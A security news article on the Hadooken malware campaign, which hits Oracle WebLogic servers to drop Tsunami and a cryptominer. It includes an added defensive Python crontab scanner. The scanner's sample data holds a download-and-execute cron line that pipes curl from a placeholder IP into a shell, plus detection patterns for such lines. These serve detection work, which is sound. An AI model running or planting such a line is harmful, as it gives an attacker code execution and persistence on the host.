New Linux Hadooken Malware Campaign Targets Oracle Weblogic for Crypto-Mining

Published on September 16, 2024
Written by:
Lore Apostol
Infosec Writer & Editor

A new malware campaign targeting Oracle's WebLogic servers hinges on a Linux-based malware known as "Hadooken," according to a report from cloud security firm Aqua Nautilus. Upon execution, Hadooken drops the Tsunami malware and deploys a crypto miner.

The campaign is designed to compromise the enterprise-grade Java EE application server and deploy a cryptominer that uses the compromised systems for illicit cryptocurrency mining.

WebLogic Server is widely used across industries such as banking, e-commerce, and other business-critical systems and offers robust support for Java technologies, transaction management, and scalability. 

Security weaknesses in WebLogic, such as deserialization flaws and improper access controls, are frequent targets for exploitation. Misconfigurations such as weak credentials or exposed admin consoles can also lead to remote code execution (RCE), privilege escalation, and data breaches if the server is not adequately secured or patched.

[Image: Hadooken malware attack flow. Image source: Aqua Nautilus]

When deployed, the Hadooken malware executes a dual-stage attack. It first drops Tsunami malware, a known DDoS tool, onto the host system. Subsequently, it deploys a cryptominer, diverting valuable system resources for unauthorized cryptocurrency mining. 

The attackers use a Unix shell script and a Python script for malicious execution, and a PowerShell script to distribute the malware. Tsunami creates cron jobs that execute the malicious payloads periodically in order to maintain persistence.
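As an added illustration for defenders (not code from the Aqua report or this article), the following Python check scans crontab text for the persistence traits described above: frequent or at-boot schedules, payloads in world-writable or hidden directories, and download-and-execute pipes. The crontab lines are constructed for the demo and are not indicators from the report.

```python
import re
# Constructed sample crontab for the demo (illustrative, not indicators from the report)
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/apt-get update
*/5 * * * * /tmp/.x/update.sh
@reboot curl -s http://203.0.113.10/c | sh
*/10 * * * * python3 /var/tmp/.cache/run.py > /dev/null 2>&1
30 4 * * 0 /usr/local/bin/backup.sh
"""
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")                 # common drop locations
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b")  # fetch piped into a shell
HIDDEN_PATH = re.compile(r"/\.[^/\s]+")                             # dot-directory or dot-file
STEP_MINUTE = re.compile(r"^\*/(\d+)$")                             # "*/N" minute field

def split_entry(line):
    """Return (schedule_fields, command), or None for blank and comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                 # @reboot, @hourly, ... use a single field
        sched, _, cmd = line.partition(" ")
        return [sched], cmd.strip()
    parts = line.split(None, 5)              # five schedule fields, then the command
    return (parts[:5], parts[5]) if len(parts) == 6 else None

def suspicious_reasons(schedule, command):
    """Persistence indicators typical of cron jobs planted by miner droppers."""
    reasons = []
    if schedule[0] == "@reboot":
        reasons.append("runs at boot")
    else:
        m = STEP_MINUTE.match(schedule[0])
        if m and int(m.group(1)) <= 15:      # very frequent re-execution keeps the payload alive
            reasons.append(f"runs every {m.group(1)} min")
    if any(d in command for d in WRITABLE_DIRS):
        reasons.append("world-writable dir")
    if HIDDEN_PATH.search(command):
        reasons.append("hidden path")
    if DOWNLOAD_EXEC.search(command):
        reasons.append("download-and-execute")
    return reasons

def scan_crontab(text, min_indicators=2):
    """Return [(entry, reasons)] for entries with at least min_indicators hits."""
    hits = []
    for line in text.splitlines():
        parsed = split_entry(line)
        if parsed and len(r := suspicious_reasons(*parsed)) >= min_indicators:
            hits.append((line.strip(), r))
    return hits
```

Requiring two indicators keeps legitimate frequent jobs (such as a monitoring script under /usr/local/bin) out of the results; run it over `crontab -l` output and the files under /etc/cron.d to triage a host.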

The IP addresses used for Hadooken are registered under the hosting company AEZA – one inactive IP in Russia and one active IP in Germany. The latter was linked to TeamTNT and Gang 8220 in the past.

Some reports indicate that one of the IP addresses the threat actor uses to download Hadooken has also been used to distribute ransomware. The threat actor may therefore be targeting Windows endpoints with ransomware as well as Linux servers running software commonly used by large organizations, where it deploys backdoors and crypto-miners.
